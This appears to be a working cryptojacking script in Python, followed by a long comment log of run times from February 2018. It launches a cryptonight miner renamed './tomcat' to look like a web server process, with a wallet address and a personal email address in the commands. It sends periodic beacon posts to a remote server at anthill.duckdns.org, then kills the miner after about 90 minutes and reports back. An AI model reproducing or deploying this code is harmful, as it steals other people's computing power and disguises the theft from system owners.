import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:06.559674
#2018-02-17 16:50:01.298564
#2018-02-17 18:38:05.465108
#2018-02-17 20:26:06.360606
#2018-02-17 22:13:04.212627
#2018-02-17 23:57:02.035635
#2018-02-18 01:47:07.504731
#2018-02-18 03:34:07.608179
#2018-02-18 05:22:01.325451
#2018-02-18 07:13:06.799345
#2018-02-18 09:01:07.086568
#2018-02-18 10:48:04.709700
#2018-02-18 12:36:05.624529
#2018-02-18 14:22:05.441064
#2018-02-18 16:12:07.688515
#2018-02-18 18:00:10.594717
#2018-02-18 19:46:07.285870
#2018-02-18 21:33:03.123750
#2018-02-18 23:22:03.672908
#2018-02-19 01:09:01.358682
#2018-02-19 02:55:02.752683
#2018-02-19 04:42:04.471190
#2018-02-19 06:26:07.332659
#2018-02-19 08:16:08.393236
#2018-02-19 10:05:08.261032
#2018-02-19 11:54:05.337335
#2018-02-19 13:41:07.616019
#2018-02-19 15:28:04.791625
#2018-02-19 17:15:11.360804
#2018-02-19 19:03:01.830097
#2018-02-19 20:48:03.893137
#2018-02-19 22:36:02.111609
#2018-02-20 00:22:06.671110
#2018-02-20 02:10:07.897371
#2018-02-20 03:59:07.230846
#2018-02-20 05:42:05.180060
#2018-02-20 07:28:05.102926
#2018-02-20 09:12:06.793985
#2018-02-20 10:55:06.546373
#2018-02-20 12:42:11.681143
#2018-02-20 14:27:07.616608
#2018-02-20 16:11:09.776574
#2018-02-20 17:56:01.780274
#2018-02-20 19:47:08.228663
#2018-02-20 21:39:04.500748
#2018-02-20 23:22:02.194957
#2018-02-21 01:06:07.965582
#2018-02-21 02:53:04.252966
#2018-02-21 04:42:02.255005
#2018-02-21 06:29:07.305273
#2018-02-21 08:14:01.754316
#2018-02-21 10:00:12.398449
#2018-02-21 11:48:06.994189
#2018-02-21 13:40:07.738942
#2018-02-21 15:25:10.965663
#2018-02-21 17:15:13.390532
#2018-02-21 19:02:01.291605
#2018-02-21 20:51:05.586980
#2018-02-21 22:37:06.941176
#2018-02-22 00:27:07.662213
#2018-02-22 02:16:04.562127
#2018-02-22 04:02:05.714901
#2018-02-22 05:48:04.122846
#2018-02-22 07:33:02.068701
#2018-02-22 09:22:01.718423
#2018-02-22 11:07:08.847365
#2018-02-22 12:52:09.659453
#2018-02-22 14:41:06.856581
#2018-02-22 16:26:09.299704
#2018-02-22 18:14:04.776486
#2018-02-22 20:07:04.587939
#2018-02-22 21:54:08.092599
#2018-02-22 23:41:05.014055
#2018-02-23 01:28:04.610159
#2018-02-23 03:14:03.821161
#2018-02-23 05:01:07.475926
#2018-02-23 06:46:02.056364
#2018-02-23 08:38:06.526772
#2018-02-23 10:53:01.302513
#2018-02-23 12:50:02.873833
#2018-02-23 14:34:06.710424
#2018-02-23 16:23:06.488751
#2018-02-23 18:10:07.223481
#2018-02-23 19:54:08.019098
#2018-02-23 21:38:07.925083
#2018-02-23 23:28:08.023275
#2018-02-24 01:20:06.203790
#2018-02-24 03:11:01.889029
#2018-02-24 04:56:05.229346
#2018-02-24 06:41:07.102199
#2018-02-24 08:30:08.703284
#2018-02-24 10:17:02.244035
#2018-02-24 12:12:06.880446
#2018-02-24 13:58:06.834062
#2018-02-24 15:50:07.406734
#2018-02-24 17:37:06.971828
#2018-02-24 19:23:05.973368
#2018-02-24 21:14:04.884409
#2018-02-24 23:49:06.073904
#2018-02-25 03:08:05.174338
#2018-02-25 07:00:09.315417